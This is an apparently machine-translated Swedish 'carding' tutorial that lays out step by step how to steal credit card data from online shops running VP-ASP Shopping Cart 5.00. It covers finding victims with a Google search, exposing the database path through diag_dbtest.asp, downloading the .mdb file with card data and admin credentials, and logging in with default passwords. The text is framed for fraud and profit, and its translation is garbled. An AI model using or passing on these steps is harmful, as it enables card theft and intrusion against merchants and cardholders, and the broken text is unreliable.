KARDNING??? (3 / 4 steg)
Steg 3: Hur till hacka??
Kreditkort Hacking
Kreditkort kan hacka av två sätt:
- Kreditkort bedrägerier (vanligen används för att tjäna pengar, några gånger för shopping)
- Kreditkort butik admin hacka (bara på kul, kunskap, shopping på internet)
Butik ADMIN metod för att stjäla kreditkort:
Låter start: dess en mycket gammal metod som knappt fungerar men ändå har ett hopp på VP-ASP
Shopping Cart Version: 5,00
1. gå till google.com och typ: VP-ASP Shopping Cart 5.002. Du kan hitta många av webbplatser med VP-ASP 5,00 cart installerat på den
Låt oss nu gå till utnyttja...
Sidan kommer att vara så här: ***://***.victim.com/shop/shopdisplaycategories.asp
Exploit är: diag_dbtest.aspNow du måste göra detta: ***://***.victim.com/shop/diag_dbtest.asp
En sida visas innehåller de:
• xDatabase
• shopping140
• xDblocation
• resx
• xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe
Exempel:
Viktigaste här är xDatabasexDatabase: shopping140Ok, nu URL-adressen kommer att vara så här: ***://***.victim.com/shop/shopping140.mdb
Om du inte hämta databasen, prova detta samtidigt som det finns dblocation:xDblocation
resxthe
URL-adressen blir: ***://***.victim.com/shop/resx/shopping140.mdb
Hämta den mdb-filen och du bör kunna öppna den med någon mdb fil betraktare, du bör kunna hitta en på download.com eller använda MS Office Access.Inside bör du kunna hitta information om kreditkort, och du bör även kunna hitta admin användarnamn och lösenord för webbplatsen.
Admin login-sidan finns vanligtvis här: ***://***.victim.com/shop/shopadmin.asp
Om du inte kan hitta admin användarnamn och lösenord i mdb-filen kan du men det är felaktigt eller du inte kan hitta filen mdb alls, sedan försöka hitta admin login-sidan och ange default lösenord som är: användarnamn: adminpassword: adminORUsername: vpasppassword: vpasp